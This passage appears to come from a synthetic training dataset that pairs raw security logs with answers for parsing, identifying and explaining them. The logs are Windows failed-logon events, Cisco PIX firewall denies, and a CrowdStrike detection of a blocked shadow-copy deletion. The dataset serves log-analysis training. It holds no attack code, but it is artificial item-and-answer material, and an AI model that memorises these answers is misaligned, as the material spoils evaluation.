\",\"LogonType\":\"3\",\"ProcessId\":\"0x0\",\"ProcessName\":\"-\",\"Status\":\"0xc000006d\",\"SubStatus\":\"0xc000006a\",\"SubjectDomainName\":\"-\",\"SubjectLogonId\":\"0x0\",\"SubjectUserName\":\"-\",\"SubjectUserSid\":\"S-1-0-0\",\"TargetDomainName\":\"SDPB\",\"TargetUserName\":\"alice\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"WorkstationName\":\"IDCSAVIYNT02\"},\"event_id\":\"4625\",\"keywords\":[\"Audit Failure\"],\"opcode\":\"Info\",\"process\":{\"pid\":740,\"thread\":{\"id\":13644}},\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":6082954626,\"task\":\"Logon\"}}",
"messagetype": "auth_failure",
"productids": [
6
],
"senderhost": "10.87.1.30",
"sensitivity": "normal",
"severitylabel": "Info",
"sourceinfo": "unknown",
"tags": [
"v8",
"eventId:4625",
"microsoft-windows-security-auditing",
"auth_failure"
],
"vendorcode": "6082954626",
"streamName": "microsoft-windows-security-auditing",
"clientIP": "153.202.14.113",
"userName": "alice"
} | Create a JSON artifact from the message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t153.202.14.113\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"153.202.14.113","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}} | Product: Windows Active Directory
Vendor: Microsoft | Identify this syslog message |
WitFoo-WinLogBeat ::: {"@metadata":{"beat":"winlogbeat","type":"_doc","version":"8.1.3"},"@timestamp":"2023-07-17T18:11:48.924Z","agent":{"ephemeral_id":"4c83ecad-c1b4-4a54-8b3d-8fd365195907","id":"8291ec57-310c-4e62-b5bc-e9ba4ac93b35","name":"03SDPBSVR03","type":"winlogbeat","version":"8.1.3"},"ecs":{"version":"8.0.0"},"event":{"action":"Logon","code":"4625","created":"2023-07-17T18:11:50.394Z","kind":"event","outcome":"failure","provider":"Microsoft-Windows-Security-Auditing"},"host":{"name":"03SDPBSVR03.SDPB.LOCAL"},"log":{"level":"information"},"message":"An account failed to log on.\n\nSubject:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\t-\n\tAccount Domain:\t\t-\n\tLogon ID:\t\t0x0\n\nLogon Type:\t\t\t3\n\nAccount For Which Logon Failed:\n\tSecurity ID:\t\tS-1-0-0\n\tAccount Name:\t\talice\n\tAccount Domain:\t\tSDPB\n\nFailure Information:\n\tFailure Reason:\t\tUnknown user name or bad password.\n\tStatus:\t\t\t0xC000006D\n\tSub Status:\t\t0xC000006A\n\nProcess Information:\n\tCaller Process ID:\t0x0\n\tCaller Process Name:\t-\n\nNetwork Information:\n\tWorkstation Name:\tIDCSAVIYNT02\n\tSource Network Address:\t153.202.14.113\n\tSource Port:\t\t61238\n\nDetailed Authentication Information:\n\tLogon Process:\t\tNtLmSsp \n\tAuthentication Package:\tNTLM\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon request fails. It is generated on the computer where access was attempted.\n\nThe Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).\n\nThe Process Information fields indicate which account and process on the system requested the logon.\n\nThe Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","organization":"oscorp","senderHost":"10.87.1.30","sensitivity":"normal","winlog":{"api":"wineventlog","channel":"Security","computer_name":"03SDPBSVR03.SDPB.LOCAL","event_data":{"AuthenticationPackageName":"NTLM","FailureReason":"%%2313","IpAddress":"153.202.14.113","IpPort":"61238","KeyLength":"0","LmPackageName":"-","LogonProcessName":"NtLmSsp ","LogonType":"3","ProcessId":"0x0","ProcessName":"-","Status":"0xc000006d","SubStatus":"0xc000006a","SubjectDomainName":"-","SubjectLogonId":"0x0","SubjectUserName":"-","SubjectUserSid":"S-1-0-0","TargetDomainName":"SDPB","TargetUserName":"alice","TargetUserSid":"S-1-0-0","TransmittedServices":"-","WorkstationName":"IDCSAVIYNT02"},"event_id":"4625","keywords":["Audit Failure"],"opcode":"Info","process":{"pid":740,"thread":{"id":13644}},"provider_guid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","provider_name":"Microsoft-Windows-Security-Auditing","record_id":6082954626,"task":"Logon"}} | This is a syslog message from a product called Windows Active Directory by Microsoft. The following fields were extracted from the message:
action: Logon
clientport: 61238
messagetype: auth_failure
productids: [6]
senderhost: 10.87.1.30
sensitivity: normal
severitylabel: Info
sourceinfo: unknown
tags: ['v8', 'eventId:4625', 'microsoft-windows-security-auditing', 'auth_failure']
vendorcode: 6082954626
streamName: microsoft-windows-security-auditing
clientIP: 153.202.14.113
userName: alice | Explain this syslog message |
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:91.195.154.213/54183 dst outside:33.56.204.210/7680 by access-group "inside"
| {
"priority": 172,
"senderhost": "10.52.255.1",
"serverport": 7680,
"severitylabel": "warning",
"tags": [
"cisco_pix_deny",
"deny",
"cisco_pix",
"firewall_action"
],
"productids": [
0
],
"severitycode": 4,
"sourceinfo": "unknown",
"message": "<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:91.195.154.213/54183 dst outside:33.56.204.210/7680 by access-group \"inside\"\n",
"sensitivity": "normal",
"facilitylabel": "local5",
"messagetype": "firewall_action",
"clientport": 54183,
"vendorcode": "PIX-4-106023",
"action": "block",
"protocol": 6,
"facilitycode": 21,
"streamName": "cisco_pix",
"clientIP": "91.195.154.213",
"serverIP": "33.56.204.210"
} | Create a JSON artifact from the message |
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:91.195.154.213/54183 dst outside:33.56.204.210/7680 by access-group "inside"
| Product: PIX Firewall
Vendor: Cisco | Identify this syslog message |
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:91.195.154.213/54183 dst outside:33.56.204.210/7680 by access-group "inside"
| This is a syslog message from a product called PIX Firewall by Cisco. The following fields were extracted from the message:
priority: 172
senderhost: 10.52.255.1
serverport: 7680
severitylabel: warning
tags: ['cisco_pix_deny', 'deny', 'cisco_pix', 'firewall_action']
productids: [0]
severitycode: 4
sourceinfo: unknown
sensitivity: normal
facilitylabel: local5
messagetype: firewall_action
clientport: 54183
vendorcode: PIX-4-106023
action: block
protocol: 6
facilitycode: 21
streamName: cisco_pix
clientIP: 91.195.154.213
serverIP: 33.56.204.210 | Explain this syslog message |
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:146.225.241.123/54183 dst outside:46.16.209.249/7680 by access-group "inside"
| {
"priority": 172,
"senderhost": "10.52.255.1",
"serverport": 7680,
"severitylabel": "warning",
"tags": [
"cisco_pix_deny",
"deny",
"cisco_pix",
"firewall_action"
],
"productids": [
0
],
"severitycode": 4,
"sourceinfo": "unknown",
"message": "<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:146.225.241.123/54183 dst outside:46.16.209.249/7680 by access-group \"inside\"\n",
"sensitivity": "normal",
"facilitylabel": "local5",
"messagetype": "firewall_action",
"clientport": 54183,
"vendorcode": "PIX-4-106023",
"action": "block",
"protocol": 6,
"facilitycode": 21,
"streamName": "cisco_pix",
"clientIP": "146.225.241.123",
"serverIP": "46.16.209.249"
} | Create a JSON artifact from the message |
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:146.225.241.123/54183 dst outside:46.16.209.249/7680 by access-group "inside"
| Product: PIX Firewall
Vendor: Cisco | Identify this syslog message |
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny tcp src inside:146.225.241.123/54183 dst outside:46.16.209.249/7680 by access-group "inside"
| This is a syslog message from a product called PIX Firewall by Cisco. The following fields were extracted from the message:
priority: 172
senderhost: 10.52.255.1
serverport: 7680
severitylabel: warning
tags: ['cisco_pix_deny', 'deny', 'cisco_pix', 'firewall_action']
productids: [0]
severitycode: 4
sourceinfo: unknown
sensitivity: normal
facilitylabel: local5
messagetype: firewall_action
clientport: 54183
vendorcode: PIX-4-106023
action: block
protocol: 6
facilitycode: 21
streamName: cisco_pix
clientIP: 146.225.241.123
serverIP: 46.16.209.249 | Explain this syslog message |
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:150.97.212.10 dst inside:120.36.48.73 (type 11, code 0) by access-group "outside"
| {
"priority": 172,
"senderhost": "10.52.255.1",
"severitylabel": "warning",
"tags": [
"cisco_pix_deny",
"deny",
"cisco_pix",
"firewall_action"
],
"productids": [
0
],
"severitycode": 4,
"sourceinfo": "unknown",
"message": "<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:150.97.212.10 dst inside:120.36.48.73 (type 11, code 0) by access-group \"outside\"\n",
"sensitivity": "normal",
"facilitylabel": "local5",
"messagetype": "firewall_action",
"vendorcode": "PIX-4-106023",
"action": "block",
"protocol": 1,
"facilitycode": 21,
"streamName": "cisco_pix",
"clientIP": "150.97.212.10",
"serverIP": "120.36.48.73"
} | Create a JSON artifact from the message |
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:150.97.212.10 dst inside:120.36.48.73 (type 11, code 0) by access-group "outside"
| Product: PIX Firewall
Vendor: Cisco | Identify this syslog message |
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:150.97.212.10 dst inside:120.36.48.73 (type 11, code 0) by access-group "outside"
| This is a syslog message from a product called PIX Firewall by Cisco. The following fields were extracted from the message:
priority: 172
senderhost: 10.52.255.1
severitylabel: warning
tags: ['cisco_pix_deny', 'deny', 'cisco_pix', 'firewall_action']
productids: [0]
severitycode: 4
sourceinfo: unknown
sensitivity: normal
facilitylabel: local5
messagetype: firewall_action
vendorcode: PIX-4-106023
action: block
protocol: 1
facilitycode: 21
streamName: cisco_pix
clientIP: 150.97.212.10
serverIP: 120.36.48.73 | Explain this syslog message |
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:108.223.199.97 dst inside:66.54.39.15 (type 11, code 0) by access-group "outside"
| {
"priority": 172,
"senderhost": "10.52.255.1",
"severitylabel": "warning",
"tags": [
"cisco_pix_deny",
"deny",
"cisco_pix",
"firewall_action"
],
"productids": [
0
],
"severitycode": 4,
"sourceinfo": "unknown",
"message": "<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:108.223.199.97 dst inside:66.54.39.15 (type 11, code 0) by access-group \"outside\"\n",
"sensitivity": "normal",
"facilitylabel": "local5",
"messagetype": "firewall_action",
"vendorcode": "PIX-4-106023",
"action": "block",
"protocol": 1,
"facilitycode": 21,
"streamName": "cisco_pix",
"clientIP": "108.223.199.97",
"serverIP": "66.54.39.15"
} | Create a JSON artifact from the message |
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:108.223.199.97 dst inside:66.54.39.15 (type 11, code 0) by access-group "outside"
| Product: PIX Firewall
Vendor: Cisco | Identify this syslog message |
<172>Feb 12 2023 14:07:02 10.52.255.1 : %PIX-4-106023: Deny icmp src outside:108.223.199.97 dst inside:66.54.39.15 (type 11, code 0) by access-group "outside"
| This is a syslog message from a product called PIX Firewall by Cisco. The following fields were extracted from the message:
priority: 172
senderhost: 10.52.255.1
severitylabel: warning
tags: ['cisco_pix_deny', 'deny', 'cisco_pix', 'firewall_action']
productids: [0]
severitycode: 4
sourceinfo: unknown
sensitivity: normal
facilitylabel: local5
messagetype: firewall_action
vendorcode: PIX-4-106023
action: block
protocol: 1
facilitycode: 21
streamName: cisco_pix
clientIP: 108.223.199.97
serverIP: 66.54.39.15 | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"fish","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=48.55.147.74 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=fish ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | {
"clienthostname": "SSTEWART-LT3.undefined",
"clientmac": "00ffc8e92fdb",
"filehash": "1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18",
"filename": "setup.exe",
"filepath": "\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"3810ea13b98a42adb0ff227fbaf6169f\",\"timestamp\":\"2023-10-17T20:24:24Z\",\"behavior_id\":\"458\",\"filename\":\"setup.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\Program Files (x86)\\\\epson\\\\EPSON Advanced Printer Driver 5\\\\TM-T88V\\\\TM-T88V Utility\\\\setup.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"C:\\\\Program Files (x86)\\\\EPSON\\\\EPSON Advanced Printer Driver 5\\\\TM-T88V\\\\TM-T88V Utility\\\\setup.exe\\\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD\",\"scenario\":\"ransomware\",\"objective\":\"Follow Through\",\"tactic\":\"Impact\",\"tactic_id\":\"TA0040\",\"technique\":\"Inhibit System Recovery\",\"technique_id\":\"T1490\",\"display_name\":\"VolumeShadowSnapshotDeleted\",\"description\":\"A process attempted to delete a Volume Shadow Snapshot.\",\"severity\":50,\"confidence\":60,\"ioc_type\":\"\",\"ioc_value\":\"\",\"ioc_source\":\"\",\"ioc_description\":\"\",\"user_name\":\"fish\",\"user_id\":\"S-1-12-1-942142572-1204970278-157880471-3270697999\",\"control_graph_id\":\"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450\",\"triggering_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079\",\"sha256\":\"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18\",\"md5\":\"eb33b049f629677d0b48ac82e1aad6d7\",\"parent_details\":{\"parent_sha256\":\"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235\",\"parent_md5\":\"c85df204a8fe49fc690202c5ccd27b5b\",\"parent_cmdline\":\"\\\"C:\\\\Users\\\\STEVEN~1\\\\AppData\\\\Local\\\\Temp\\\\APD5\\\\Setup.exe\\\" \",\"parent_process_graph_id\":\"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312\"},\"pattern_disposition\":1024,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_moscorpine\":false,\"quarantine_file\":false,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":true,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=48.55.147.74 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe ::: userName=fish ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-10-17T20:24:24Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "48.55.147.74",
"userName": "fish"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"fish","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=48.55.147.74 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=fish ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow Snapshot.","severity":50,"confidence":60,"ioc_type":"","ioc_value":"","ioc_source":"","ioc_description":"","user_name":"fish","user_id":"S-1-12-1-942142572-1204970278-157880471-3270697999","control_graph_id":"ctg:3810ea13b98a42adb0ff227fbaf6169f:81604677450","triggering_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594730739079","sha256":"1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18","md5":"eb33b049f629677d0b48ac82e1aad6d7","parent_details":{"parent_sha256":"faf27799b04c2780dc06360f77d13d0656d78658a005d7e20a44d45b4b3f2235","parent_md5":"c85df204a8fe49fc690202c5ccd27b5b","parent_cmdline":"\"C:\\Users\\STEVEN~1\\AppData\\Local\\Temp\\APD5\\Setup.exe\" ","parent_process_graph_id":"pid:3810ea13b98a42adb0ff227fbaf6169f:4594712136312"},"pattern_disposition":1024,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_moscorpine":false,"quarantine_file":false,"policy_disabled":false,"kill_parent":false,"operation_blocked":true,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=48.55.147.74 ::: fileHash=1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18 ::: fileName=setup.exe ::: filePath=\Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe ::: userName=fish ::: clientMAC=00ffc8e92fdb ::: created_at=2023-10-17T20:24:24Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-17T20:24:24Z ::: clientHostname=SSTEWART-LT3.undefined ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: SSTEWART-LT3.undefined
clientmac: 00ffc8e92fdb
filehash: 1a47b9ec8ffa137a49a9ee5de6dcc2037179d1b2213ae54fe3c5cbef3145ca18
filename: setup.exe
filepath: \Device\HarddiskVolume3\Program Files (x86)\epson\EPSON Advanced Printer Driver 5\TM-T88V\TM-T88V Utility\setup.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-10-17T20:24:24Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 48.55.147.74
userName: fish | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"3810ea13b98a42adb0ff227fbaf6169f","timestamp":"2023-10-17T20:24:24Z","behavior_id":"458","filename":"setup.exe","filepath":"\\Device\\HarddiskVolume3\\Program Files (x86)\\epson\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe","alleged_filetype":"exe","cmdline":"\"C:\\Program Files (x86)\\EPSON\\EPSON Advanced Printer Driver 5\\TM-T88V\\TM-T88V Utility\\setup.exe\" -PSM -HIDE_PROGRESS -W32:592210 -PRD:APD","scenario":"ransomware","objective":"Follow Through","tactic":"Impact","tactic_id":"TA0040","technique":"Inhibit System Recovery","technique_id":"T1490","display_name":"VolumeShadowSnapshotDeleted","description":"A process attempted to delete a Volume Shadow 